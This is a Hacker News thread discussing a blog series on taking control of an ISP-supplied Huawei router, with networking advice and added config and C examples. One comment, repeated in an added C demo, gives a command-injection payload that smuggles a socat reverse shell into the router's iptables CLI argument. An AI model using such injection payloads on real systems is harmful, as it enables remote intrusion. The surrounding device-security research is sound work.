
A detailed look at the router provided by my ISP - paddlesteamer
https://0x90.psaux.io/2020/03/01/Taking-Back-What-Is-Already-Yours-Router-Wars-Episode-I/
======
blakesterz
Interesting read! There's actually 3 parts to this:

Part 2: [https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-II/)

And 3: [https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-III/)

Summary from the end of Part 3:

"So we managed to change passwords for both ssh and telnet, gain access to
Root user for the web interface, changed that password too. We changed ACS URL
to ours and remove the IP restrictions. To put it simply, we cleaned up our
router from our ISP. Good for our privacy."

~~~
sheep-a
You forgot this bit of the summary, which I think is more interesting!

"Still there is an authorized ssh key left in the firmware but for now it’s
enough that we’re keeping the ISP out. Maybe in the future, we can repack the
firmware with our configuration and keys and install it on the router. For
now, take care!"

------
jason0597
It's funny to think that if you were to report all of your findings to your
local newspaper (Turkish newspaper in this case), as to how Turkish ISPs have
complete access to your router or how Huawei (China) has an SSH key for your
router, people would go absolutely ballistic. But for us it's just another day
of expected craziness and we're tired of talking about it.

~~~
0xff00ffee
I'm pretty sure my new CenturyLink fiber router is similar. I tried to create
a PPPoE connection from my WRT1900 directly to CenturyLink using the same
credentials and I couldn't connect to my internet. However, now I am motivated
to create a bridge and find out why.

For CenturyLink fiber I have two boxes:

Box A: the exterior fiber enters this box, the tech said it was a
"translator"; and the port 4 ethernet on it goes to ...

Box B: the CenturyLink wireless router, which performs the PPPoE with my
credentials which were somehow hardwired because no one ever told me my
username/password. I'm guessing TR-069? Then port 4 on this goes to ...

Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and
office.

I figured Box B was redundant, but trying to remove it has been problematic.

~~~
Tourus
> PPPoE with my credentials which were somehow hardwired because no one ever
> told me my username/password

They make it very hard to use your own "Box B", but I've set this up twice now
(most recently last week). Get the username and password from CenturyLink (the
tech that installs the service has this, or call them). Then, google search
"century link vlan 201 wan tag". The trick is you need a router that has this
functionality, most basic consumer ones don't.

Unfortunately, even if you follow all directions and it still doesn't work,
troubleshooting is a nightmare, with very little or no help from their customer
support.
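
An added example of the "VLAN-tagged PPPoE WAN" setup described above, not configuration from the post or from any ISP: an OpenWrt `/etc/config/network` fragment that creates an 802.1Q sub-interface on the physical WAN port and runs PPPoE over it. It assumes an OpenWrt 21.02-or-later (DSA) build whose WAN port is named `wan`, the VLAN ID 201 mentioned in the comment, and placeholder credentials; the port name and VLAN ID are the two things to check against your own hardware and ISP.

```uci
# /etc/config/network (OpenWrt, DSA-style port names). Assumed: physical port 'wan',
# ISP expects PPPoE inside VLAN 201. Credentials are placeholders.

config device
	option name 'wan.201'
	option type '8021q'
	option ifname 'wan'
	option vid '201'

config interface 'wan'
	option device 'wan.201'
	option proto 'pppoe'
	option username 'user@example.isp'
	option password 'CHANGEME'
	# pull IPv6 prefix/address over the same PPP session if the ISP offers it
	option ipv6 'auto'
```

After editing, `/etc/init.d/network restart` and watch `logread -f` for the PPP negotiation; if the PADI goes unanswered, the tag or port name is wrong, which is the "nightmare to troubleshoot" case because nothing on the ISP side will tell you.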

~~~
0xff00ffee
Ah I see. My WRT1900AC doesn't have that option. I was running OpenWRT but ran
into some issues and panicked back to the default firmware. Now that I have
another wireless router I might dare it again.

~~~
jacob019
OpenWRT is fantastic when you get used to it. I prefer the CLI but the GUI
works well too.

------
LeonM
In the Netherlands we now have a law where ISPs must allow your own choice of
network equipment. This means they must give you the required information on
how to connect your own device with their network.

I have a fiber connection, which I connected directly to a Ubiquiti router
through a suitable SFP module. My ISP supplied the information on the fiber
type and which VLAN IDs to set up for internet, TV and telephony.

This way I have my own equipment, that I control myself. The 'modem' [0] which
my ISP supplied is still in its original, unopened box.

~~~
lima
Same in Germany! ISPs hate it because it makes their lives a lot harder -
in cable networks, they now have to deal with a zoo of endpoints on a shared
medium vs. a small set of standardized devices.

As a customer, I like it.

~~~
pdonis
_> ISPs hate it because it makes their lives a lot harder - in cable
networks, they now have to deal with a zoo of endpoints on a shared medium vs.
a small set of standardized devices._

In other words, ISPs hate it because it forces them to actually do their jobs
and be ISPs. The Internet itself is "a zoo of endpoints on a shared medium",
and ISP stands for _Internet_ Service Provider.

~~~
josephmosby
It's not the provision of Internet that's the problem, it's the customer
service requests.

e.g., AT&T could provide perfect service to the home endpoint, but the
customer bought some aftermarket router from their cousin, who had configured
it for Verizon. Customer calls AT&T to holler. Tier 1 support doesn't know
what that particular router config GUI even looks like, so it gets bumped to
T2 or T3. Ultimately to find out that the customer's cousin had hardcoded DNS
to some internal Verizon system that's not visible to AT&T.

Repeat x100K. ISPs' job isn't just "provide the Internet," it's also "provide
all the troubleshooting for every non-technical customer who just wants to
watch Netflix but doesn't even know what a router is."

~~~
pdonis
_> ISPs' job isn't just "provide the Internet," it's also "provide all the
troubleshooting for every non-technical customer who just wants to watch
Netflix but doesn't even know what a router is"_

No ISP that I'm aware of will provide troubleshooting for devices they don't
own. They just say "sorry, not our device, not our problem". When I installed
my own cable modem and router, Comcast was quite clear about that. And I said
"fine, no problem".

~~~
iagovar
The ISP I work for does, and it's a very large one (not in the US). If a
router is not ours, we check for sync or if PPPoE is up. We tell the customer
what's the result of our tests and offer a technician if they are willing to
pay in case it's not our fault.

Most people are unwilling to pay, and yell at customer service. Most of the
time, especially when the router has sync, it's the customer's fault.

~~~
the8472
> we check for sync or if PPPoE is up.

The problem with this kind of procedure is that it's only a reasonable way to
locate the problem when there are problems at that very moment. You're getting
stonewalled when - during the day - you're reporting that it frequently loses
sync during the night.

~~~
iagovar
We can track sync changes, or really almost anything, crc errors, traffic,
whatever we want really, although we only do it on demand.

You put a customer ID in the tracking system and it queries and stores results.
It also performs analysis automatically, but most cases just puts the result
in a frontend for analysis.

------
non-entity
A while back, I was playing around with the cable modem / router the ISP gave
me because I was curious and an idiot. After screwing around a bit, I managed
to find a vulnerability that exposed technician credentials plaintext and they
actually worked. Had no idea where to report it though, because the
manufacturer's contact page could be summed up as _fuck you we don't talk
directly to consumers_. I dont think the vulnerability was that bad, as you
had to be logged in to the web interface already with another account, but
still.

I don't really trust ISP provided hardware / software now though.

~~~
praptak
The right thing to do in such circumstances is to publish the vulnerability.

~~~
ProZsolt
But how do you publish it without the liability of getting sued? A person like
me who doesn't work in security still occasionally finds some vulnerability.
Sometimes you get angry emails from the company even if you just try to warn
them.

~~~
jeroenhd
If you think they'd sue, you can always send the details to a tech journalist
specialized in such matters (someone with a proven track record of protecting
their sources). Use an anonymous email service to be sure.

If something goes wrong, they'll take the threat of legal action and probably
win. Companies know that suing journalists often leads to more bad press than
cooperating. They can even try to contact the company in question for you if
the vulnerability is bad enough.

If the company doesn't respond or get their shit together, journalists will
get a scoop and the company is forced to fix their shit. If the company does
fix their shit, the journalist will still get a story out of it and you can
rest easy that you've helped make the internet just a little bit safer for
everyone.

------
miki123211
Apparently a Polish carrier called Multimedia has recently introduced a new,
revolutionary service for some customers. It's called "set up a custom Wi-Fi
configuration", and it's just 5 PLN (a little over $1)! It lets you think up
an SSID and password, and configure your router to use those! That's an
amazing invention, isn't it? /s

Some customers apparently have absolutely no access to their routers, not even
to the web interface, and they can't use their own either. All reconfiguration
must be done through the customer service portal or by phone. That means the
carrier can charge for every little thing, including changing the Wi-Fi
config! I'm not sure if you can even bridge, but I guess not. Note that this
does not affect all customers of that carrier, just a minority.

~~~
gbrown
Couldn't you just daisy chain a second router via Ethernet and use it? Bonus
points for VPN-ing all of your traffic.

~~~
the8472
Daisy-chaining routers can severely degrade some services (gaming, p2p) due
to NAT. Assuming the ISP-provided one supports PCP or UPnP-IGD, you need a
client on your own router that relays port forwarding configuration to the
upstream router. This is possible but may need non-trivial setup.
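
The relay the8472 describes would speak PCP (RFC 6887) to the upstream ISP router on UDP port 5351: for every port your own router wants reachable, it sends a MAP request upstream and reads back the assigned external port. As an added example, not code from the post or from any router firmware, here is a C encoder for the MAP request and a decoder for the MAP response, plus a constructed stand-in for the upstream router's reply so the exchange runs offline. The addresses, ports and nonce are made up; a real deployment sends the request over a UDP socket and only trusts a reply whose nonce matches, which is the check the decoder enforces.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* RFC 6887 constants. */
#define PCP_VERSION       2
#define PCP_OP_MAP        1
#define PCP_RESPONSE_BIT  0x80
#define PCP_RESULT_SUCCESS 0
#define PCP_MAP_LEN       60   /* 24-byte common header + 36-byte MAP opcode, request and response alike */

struct pcp_map {
    uint8_t  nonce[12];        /* random per mapping; ties responses to our request */
    uint8_t  protocol;         /* 6 = TCP, 17 = UDP */
    uint16_t internal_port;
    uint16_t external_port;    /* suggested in the request, assigned in the response */
    uint32_t lifetime;         /* seconds; renew before it expires */
    uint8_t  external_ip4[4];  /* all-zero in the request = no preference */
};

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
static uint32_t get32(const uint8_t *p) { return (uint32_t)get16(p) << 16 | get16(p + 2); }

/* PCP carries every address as 128 bits; IPv4 goes in as IPv4-mapped IPv6 (::ffff:a.b.c.d). */
static void put_mapped_ip4(uint8_t *p, const uint8_t ip4[4]) {
    memset(p, 0, 16);
    p[10] = 0xff; p[11] = 0xff;
    memcpy(p + 12, ip4, 4);
}

/* Encode a MAP request. client_ip4 is the address our router holds on the upstream
   router's LAN (its WAN side). Returns bytes written or -1. */
int pcp_encode_map_request(const struct pcp_map *m, const uint8_t client_ip4[4],
                           uint8_t *out, size_t outsz) {
    if (outsz < PCP_MAP_LEN) return -1;
    memset(out, 0, PCP_MAP_LEN);
    out[0] = PCP_VERSION;
    out[1] = PCP_OP_MAP;                       /* R bit clear: request */
    put32(out + 4, m->lifetime);
    put_mapped_ip4(out + 8, client_ip4);
    memcpy(out + 24, m->nonce, 12);
    out[36] = m->protocol;                     /* bytes 37..39 reserved */
    put16(out + 40, m->internal_port);
    put16(out + 42, m->external_port);         /* suggestion only */
    put_mapped_ip4(out + 44, m->external_ip4); /* ::ffff:0.0.0.0 = let the server pick */
    return PCP_MAP_LEN;
}

/* Decode a MAP response into m. Returns 0 on success, -1 if malformed or not a reply to
   our nonce (drop it: anyone on the segment can spoof UDP), or the server's result code. */
int pcp_decode_map_response(const uint8_t *in, size_t inlen,
                            const uint8_t expect_nonce[12], struct pcp_map *m) {
    if (inlen < PCP_MAP_LEN) return -1;
    if (in[0] != PCP_VERSION || in[1] != (PCP_RESPONSE_BIT | PCP_OP_MAP)) return -1;
    if (memcmp(in + 24, expect_nonce, 12) != 0) return -1;
    if (in[3] != PCP_RESULT_SUCCESS) return in[3];   /* e.g. 2 = NOT_AUTHORIZED */
    memcpy(m->nonce, in + 24, 12);
    m->lifetime      = get32(in + 4);              /* bytes 8..11 are the server epoch */
    m->protocol      = in[36];
    m->internal_port = get16(in + 40);
    m->external_port = get16(in + 42);             /* what was actually assigned */
    memcpy(m->external_ip4, in + 44 + 12, 4);      /* last 4 bytes of the mapped address */
    return 0;
}

/* Constructed stand-in for the upstream router: the SUCCESS response it would send if
   it granted the request as-is. Only for running the exchange offline; not a PCP server. */
int pcp_fake_map_response(const uint8_t *req, uint8_t *out, size_t outsz,
                          uint16_t assigned_port, const uint8_t ext_ip4[4]) {
    if (outsz < PCP_MAP_LEN) return -1;
    memset(out, 0, PCP_MAP_LEN);
    out[0] = PCP_VERSION;
    out[1] = PCP_RESPONSE_BIT | PCP_OP_MAP;
    out[3] = PCP_RESULT_SUCCESS;
    memcpy(out + 4, req + 4, 4);      /* lifetime granted as requested */
    put32(out + 8, 1234);             /* server epoch time, arbitrary here */
    memcpy(out + 24, req + 24, 12);   /* echo the nonce */
    out[36] = req[36];
    memcpy(out + 40, req + 40, 2);    /* internal port unchanged */
    put16(out + 42, assigned_port);
    put_mapped_ip4(out + 44, ext_ip4);
    return PCP_MAP_LEN;
}

int main(void) {
    /* Constructed sample: forward TCP 22 of the downstream router through the upstream one. */
    struct pcp_map m = { .nonce = {1,2,3,4,5,6,7,8,9,10,11,12}, .protocol = 6,
                         .internal_port = 22, .external_port = 22, .lifetime = 3600 };
    const uint8_t client[4] = {192, 168, 1, 2}, ext[4] = {203, 0, 113, 7};
    uint8_t req[PCP_MAP_LEN], resp[PCP_MAP_LEN];
    struct pcp_map got;
    pcp_encode_map_request(&m, client, req, sizeof req);
    pcp_fake_map_response(req, resp, sizeof resp, 22, ext);
    if (pcp_decode_map_response(resp, sizeof resp, m.nonce, &got) == 0)
        printf("mapped %u -> %u.%u.%u.%u:%u for %us\n", got.internal_port, got.external_ip4[0],
               got.external_ip4[1], got.external_ip4[2], got.external_ip4[3], got.external_port, got.lifetime);
    return 0;
}
```

In practice the relay listens for UPnP/PCP requests from LAN hosts, translates each into one of these MAP requests towards the ISP router, and refreshes them before `lifetime` runs out; the external port it gets back may differ from the one it asked for, so it must report the assigned value, not the suggested one, back to the LAN client.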

~~~
pathseeker
PCP that allows ingress connections without an established egress connection
is rarely enabled. The same applies to UPnP because of the baddies.

[https://en.wikipedia.org/wiki/Port_Control_Protocol#Security](https://en.wikipedia.org/wiki/Port_Control_Protocol#Security)

------
davedx
Fantastic write up from a hacking point of view. I did wonder about this
statement though:

"This is very invasive and unacceptable. It may seem necessary to apply
security patches published by your ISP but the user should be able to disable
it whenever she wants."

Legally, at least in countries where I've lived, the ISP still owns the
router. This surprised me a bit when I first found out, but then I got used to
the idea, but you should treat any ISP or telecom gear in your house as
something that's "rented but still owned and controlled by someone else".

~~~
blacksmith_tb
True, but I think it's worth comparing it to other utilities in your home -
what if your electric company could make all your lightbulbs 20% dimmer
without notice? Or if your water heater was remotely administered? ISPs, like
mobile telcos, like to claim they must have control over your hardware "for
security" but I think the most charitable interpretation is that it's to make
their customer service dept. sweat less (more nefarious possibilities exist,
of course).

~~~
CJefferson
The difference is that non-updated routers can cause global problems. At the
very least as an ISP I'd want to say you can look after updates yourself, but
we will disable your access to the internet (other than to get the update from
us) whenever we try to push an update to you and you reject it.

------
mercora
it looks like this CLI has some hardcoded shell commands with variable
substitutions that look possibly unprotected against command injection.

For example

    
    
      iptables %s > %s 2>&1
    

could probably be executed as

    
    
      iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1
    

by issuing

    
    
      iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
    

and therefore it might be possible to get real shell access too.

~~~
paddlesteamer
Hello, OP here, I've actually spent a considerable amount of time trying to find a code
execution. I know you'll want to learn details of FUN_004122c0 but here is the
decompiled version of the iptables part from Ghidra:

    
    
      undefined4 FUN_004045a0(int param_1,int *param_2)
      
      {
        int iVar1;
        int iVar2;
        char *pcVar3;
        char cVar4;
        code *pcVar5;
        undefined auStack544 [256];
        undefined auStack288 [260];
        
        FUN_00412530(auStack544,0,0x100);
        FUN_00412530(auStack288,0,0x100);
        if (param_1 == 0) {
          FUN_004122c0(auStack288,0x100,"iptables > %s 2>&1","/var/IptablesInfo");
        }
        else {
          iVar1 = FUN_00412210(0x100);
          if (iVar1 == 0) {
            return 0x40010009;
          }
          cVar4 = '\0';
          while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
            if (cVar4 == '\0') {
              FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
            }
            else {
              FUN_004122c0(iVar1,0x100,"%s %s",iVar1,iVar2);
            }
            cVar4 = cVar4 + '\x01';
            param_2 = param_2 + 1;
          }
          FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
          FUN_00412660(iVar1);
        }
        FUN_00412330(auStack288);
        iVar1 = FUN_004123c0("/var/IptablesInfo",0x414f68);
        if (iVar1 == 0) {
          pcVar5 = FUN_004126e0;
          pcVar3 = "Fail\r";
        }
        else {
          while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
            FUN_004126b0(0x412c84,auStack544);
            FUN_004121a0(0xd);
          }
          FUN_00412520(DAT_0042b010);
          FUN_004123a0(iVar1);
          pcVar5 = FUN_00412500;
          pcVar3 = "/var/IptablesInfo";
        }
        (*pcVar5)(pcVar3);
        return 0;
      }
    

Any ideas?
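
An added example, not code from the post or from the router firmware: the command-construction pattern the decompile shows (up to 16 user tokens joined with spaces, then pasted into `"iptables %s > %s 2>&1"` and handed to a shell, on the assumption that FUN_004122c0 is snprintf and FUN_00412330 is system, which the call shapes suggest), next to the way it should be done. The argument list is constructed; the hardened version rejects shell metacharacters and execs iptables with an argv instead of going through `sh -c`. This mirrors only the pattern, not whatever earlier tokenising the real CLI does, so it says nothing about why the injection attempt above did not work.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX  256                 /* same 0x100 buffer size as the decompile */
#define MAX_ARGS 16                  /* the cVar4 != 0x10 loop bound */
#define OUT_FILE "/var/IptablesInfo"

/* Vulnerable pattern: join the tokens and build a shell command line with a format
   string. Whatever the shell treats specially in a token (';', '|', '$(...)', backticks)
   is honoured when the string reaches system(). */
int build_cmd_vulnerable(char *const *args, int nargs, char *out, size_t outsz) {
    char joined[CMD_MAX] = "";
    for (int i = 0; i < nargs && i < MAX_ARGS; i++) {
        if (i > 0) strncat(joined, " ", sizeof joined - strlen(joined) - 1);
        strncat(joined, args[i], sizeof joined - strlen(joined) - 1);
    }
    return snprintf(out, outsz, "iptables %s > %s 2>&1", joined, OUT_FILE);
}

/* Hardened: allow only characters iptables arguments legitimately need
   (option names, chain/table names, addresses, ports, '!' for negation).
   Rejecting everything else rules out every shell metacharacter. */
int is_safe_arg(const char *a) {
    if (a == NULL || *a == '\0') return 0;
    for (; *a; a++) {
        if (('a' <= *a && *a <= 'z') || ('A' <= *a && *a <= 'Z') ||
            ('0' <= *a && *a <= '9') || strchr("-_.:/,!", *a))
            continue;
        return 0;
    }
    return 1;
}

/* Run iptables with an argv, stdout/stderr redirected to OUT_FILE, no shell involved.
   Returns iptables' exit status, or -1 if an argument was rejected or exec failed.
   A real firmware would use the absolute path of its iptables binary instead of PATH. */
int run_iptables_safe(char *const *args, int nargs) {
    char *argv[MAX_ARGS + 2];
    if (nargs < 0 || nargs > MAX_ARGS) return -1;
    for (int i = 0; i < nargs; i++)
        if (!is_safe_arg(args[i])) return -1;
    argv[0] = "iptables";
    for (int i = 0; i < nargs; i++) argv[i + 1] = args[i];
    argv[nargs + 1] = NULL;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int fd = open(OUT_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0) _exit(127);
        dup2(fd, STDOUT_FILENO);
        dup2(fd, STDERR_FILENO);
        close(fd);
        execvp("iptables", argv);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed injection attempt in the shape mercora suggested. */
    char *attack[] = {"-L;", "socat", "tcp-connect:10.0.0.1:4444", "exec:sh"};
    char cmd[CMD_MAX];
    build_cmd_vulnerable(attack, 4, cmd, sizeof cmd);
    printf("shell would run: %s\n", cmd);
    printf("hardened path returns %d (argument rejected before exec)\n",
           run_iptables_safe(attack, 4));
    return 0;
}
```

The point of the allowlist is that it is tested on each argv element before anything is executed; even a token such as `exec:sh`, which is harmless on its own, only ever reaches `iptables` as one argv entry, so there is no second parser to smuggle commands through.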

~~~
mercora
i guess you already tried issuing commands like i mentioned?!

i am still confused by this code but to me it looks like this has been
originally written in another language but maybe this is just what it looks
like after de-compiling. seeing this function would likely be more
interesting.

~~~
paddlesteamer
Yep, I tried. No luck there

------
1_player
Very interesting article.

What about that precompiled .ssh/authorized_keys with user
z00163152@HUAWEI-627FB9A3 mentioned in Part 3?

Any reason why a router firmware would permit root access to anyone at all?
Definitely sounds like a backdoor to me.

~~~
skoskie
That was the worst part. I would have that bombshell as the lede. And then
delete it if possible.

------
zeroflow
...and that's why my ISP's router is running in modem mode with a non-ISP-
controlled router from Ubiquiti behind it - which I may replace with a pfSense
box in the future.

I'm pretty happy that my cable ISP is allowing this mode so I don't have to
double-NAT in my setup.

~~~
awelkie
If your ISP didn't have that feature, could you just replace the cable modem
too? My ISP's router is running EuroDOCSIS 3.0 and I'm wondering if I could
replace the router with a modem + router of my own.

~~~
zeroflow
Sadly I could not, since the ISP is defining the router as the endpoint of
its network so there is no freedom to choose different models.

~~~
em-bee
practically though what is the difference between having the endpoint in a
shaft by the elevator or in your apartment or even down the street? in all
scenarios i'd put my own router behind the ISP equipment and run my local
network however i want.

the only issue is with getting a public ip address for inbound connections.

here we are not getting public ip addresses anyways, so the point is moot for
me. but if you do get one, then all they need to do is configure their router
to forward the public ip to yours.

in my case the ISP even installed two routers. one was theirs that i had no
access to and one was "ours" that i was able to configure as i liked or
replace with my own. both routers had their own wifi, but i don't use the one
from the ISP endpoint router

------
AdmiralAsshat
I never thought to nmap my own router until reading this.

    
    
      PORT      STATE SERVICE
      53/tcp    open  domain
      80/tcp    open  http
      631/tcp   open  ipp
      5000/tcp  open  upnp
      7777/tcp  open  cbt
      20005/tcp open  btx
    

Now begins the three-hours-and-counting rabbit hole of trying to figure out
what the hell is running on ports 7777 and 20005. Or why UPNP is apparently
running, despite UPNP being explicitly disabled on the Netgear router's admin
page.

~~~
manifoldgeo
Maybe it's a remote administration port for your ISP. I have a router provided
by Frontier, formerly Verizon FiOS, where port 4567 is always open and cannot
be closed with a firewall rule from the router's web UI (grayed out). After
some googling I found out that it's their maintenance port:
[https://www.speedguide.net/port.php?port=4567](https://www.speedguide.net/port.php?port=4567)

For a while I had my own OpenWRT router in place of the ISP one, but I think
they got wise to it and blocked the MAC. I changed it to match the ISP
router's MAC address, but it only worked for about 3 minutes before being
blocked again.

~~~
AdmiralAsshat
I bought both my modem and my router, so I'd be a little incredulous if my ISP
had somehow forced a port open on it.

The 20005 one _may_ be some port that NetGear uses for its USB Printing, I've
found some articles that mention it.

It also struck me that I hit it with nmap using the LAN IP, so perhaps these
are only open _within_ the network. I probably need to hit the external IP of
the router to see what is externally open. ShieldsUP! didn't show anything
unusual.[1]

EDIT: Disclosure of a vulnerability regarding port 20005[2], and Netgear
confirming that it does affect my router[3], but should have been fixed. I
assume the "fix" was fixing the buffer overflow vulnerability, rather than
closing the port altogether.

[1]
[https://www.grc.com/x/ne.dll?bh0bkyd2](https://www.grc.com/x/ne.dll?bh0bkyd2)

[2]
[https://www.kb.cert.org/vuls/id/177092/](https://www.kb.cert.org/vuls/id/177092/)

[3] [https://kb.netgear.com/28393/NETGEAR-Product-
Vulnerability-A...](https://kb.netgear.com/28393/NETGEAR-Product-
Vulnerability-Advisory-ReadySHARE)

------
lxe
> After looking into folders, I found some interesting files. I won’t go
> through them here but I want to mention just one of them: [$ cat
> etc/ssh/authorized_keys]. Maybe an engineer from Huawei (I assume
> z00163152@HUAWEI-627FB9A3) who owns a specific DSS key, can connect all
> HG253s routers without needing a password, who knows?

Who knows indeed?!

------
fulafel
Trivia: Strictly speaking a box that does NAT is not a router in the IP
protocol sense, it's a kind of proxy. The router requirements RFC explicitly
forbids altering most fields (incl the address field) in the IP header.

~~~
packet_nerd
The box in people's homes colloquially known as a router actually commonly
combines a lot of functions into one:

* router

* firewall

* NAT device

* modem

* switch

* access point

* DNS resolver

* DHCP server

And probably others I'm not thinking of :-)

~~~
sandov
ONT in the case of fiber. Don't know if it technically counts as a modem.

~~~
bobbob1921
Media converter maybe? (Like those $100 or so fiber to ethernet converters, I
say this as it’s usually a modem/router plugged into the ONT‘s ethernet port
that does isp to cpe authentication, tunneling, etc. so the ONT is just
converting fiber (from isps OLT) to ethernet for something more common to plug
into)

------
ege_erdogan
I am using the exact same router from the same ISP. I was wondering what the
problem was when I wasn't able to forward port 22 to my computer for an SSH
connection.

I had thought it had something to with the ISP allocating the same static IP
to multiple clients and blocking some common ports to prevent collisions
(ended up using port 109.. something for SSH). Turns out it was more
interesting!

------
jscholes
Enjoyed this write-up, but most of the exploration seemed to be facilitated by
someone having already leaked the CLI root password online. Anyone have
suggestions on how you might otherwise obtain that information?

~~~
paddlesteamer
Hi, OP here, actually it's not true. Think of the scenario like this: you don't
have the CLI root password, you just do a MitM attack and learn the root
password when your ISP attempts to change it. This applies to my situation; also
I could learn the default password just by looking into the firmware.

------
j_h
EU net neutrality regulation grants end users right to use their own
equipment.

[https://fsfe.org/activities/routers/](https://fsfe.org/activities/routers/)

~~~
Someone1234
Turkey isn't in the EU.

~~~
anticensor
IANAL, but Turkcell would lose the case in Turkey too. This is not due to net
neutrality regulations (Turkey deliberately lacks it), but due to case law
arisen from competition and customer rights regulations. However, telcos work
around that too, by "leasing" modems, like telephone divisions did in the
past. Does the trick of "leasing" work in the EU too?

~~~
mercora
In marketing they try hard to make it sound like what you are going to get by
renting their device is WiFi, not just the ability to turn on the WiFi
functionality of the CPE. Of course everybody wants that but most people don't
get that it's not something that has to be provided by the ISP. I am not sure if
it's required, but I have often seen a lower-end device (without WiFi
accessible) given for the lifetime of the contract free of charge.

In Germany you have the right to use a compatible device you own yourself.
However my ISP Vodafone does not accept lots of modems as compatible and when
this regulation started there were basically none you could actually buy. It's
not much better now I guess, but I digress.

EDIT: reading your comment again, the trick you mentioned probably works
because it's "yours" when you lease it instead of renting it?

~~~
anticensor
Not instead of renting, but of selling.

------
mafuy
Many people here pointed out a problem: Removing access for the ISP and/or
device manufacturer means they cannot fix bugs remotely and automatically.
This is bad in situations like when the Mirai malware hit.

How about this?: "You can use your own device and we provide all required
information, but there will be no advanced support and you have to check for
bugfixes yourself monthly."

... now that I wrote it, I see the answer: There is no way to enforce this,
especially not reliably.

~~~
marcosdumay
Ok, from the Wikipedia:

> Mirai then identifies vulnerable IoT devices using a table of more than 60
> common factory default usernames and passwords

Taking control of the device is exactly the kind of thing that stops that
attack.

------
greatjack613
Finally some proof that Huawei does have back doors in their network
equipment.

In part 3 [https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
Already...](https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already-
Yours-Router-Wars-Episode-III/) the author writes that a Huawei engineer has
an authorized ssh key that would allow them to access your router.

Just Wow!

------
gumby
I clicked through to the two follow ups — this is both excellent sleuthery and
a wonderful write up.

------
PascLeRasc
Slightly off-topic: I'd really like to run screenfetch on my router (Asus
RT-N66U), but it doesn't have enough free space to sftp the script to it [1].
Piping the script just freezes up. Does anyone know a good workaround? Has
anyone ever tried this?

[1] [https://unix.stackexchange.com/questions/510947/how-can-i-
ru...](https://unix.stackexchange.com/questions/510947/how-can-i-run-a-script-
on-a-unix-box-without-enough-space-to-store-it)

~~~
Topgamer7
Check if your router has tmpfs mounted. IIRC that's RAM, it should probably
have enough space for you to upload it and run it from there.

------
hestefisk
My ISP (Internode) provides a 'modem' for my NBN hybrid coax / fibre
connection. I just put my OPNsense router in front of it and it's all secure.
They provided me with all the config settings, which are a bit more obscure
than usual (PPPoE but on a specific VLAN tag). Works like a charm and I don't
have to worry about weird government wiretapping or backdoors. My ISP provides
an IPv6 range too, which is pretty cool.

------
Thaxll
You're lucky to have an SSH server active, on mine I had to open the router
and dump the firmware manually :/

------
skizm
My ISP has a cloud access "feature". If I go to 192.168.1.1 it redirects me to
their "router.MYISP.net" site. What's the best way to go about disabling this?
Should I just dump the rented router for my own?

~~~
simplyinfinity
Asus (and others) have the same feature. In my case it's a simple redirect
from the IP 192.168.1.1 to router.myasus.com, which has a DNS record of
192.168.1.1. So all it does is redirect to a domain.

------
tibbydudeza
Wow, some good detective skills at work here. Got a similar Huawei HG635 from
my provider ... kept it because it supports LTE cutover.

Fortunately some kind person leaked the admin password so that I could
configure it to my liking.

------
wyclif
I'm overseas now, and using one of these crappy ISP-provided routers. I miss
my nice Linksys router back home with high-density mesh, tri-band WiFi, and
four gigabit ethernet ports.

------
k__
The only router with good admin interface I ever had was one with open source
software.

Every other router, for 20 years now, had a slow and buggy web interface.

Why is this?!

------
0xff00ffee
Why did port 8015 show up on the remote system after resetting firmware?
Shouldn't nmap have reported that?

~~~
usmannk
It was a “fast nmap”, so only the top 100 most common ports were checked.

~~~
0xff00ffee
Ah, thanks. If nmap was run exhaustively on all 64k ports, would that both (a)
take forever, and (b) raise alarm bells on the target? Why isn't a full scan
the norm?

~~~
usmannk
Yes to both of those (but not thaaat long). But in this case I still would
have run an exhaustive nmap because it's a device on my local network rather
than a remote server.

------
sloshnmosh
I very much enjoyed this! I bookmarked your site and hope to read more of your
posts in the future.

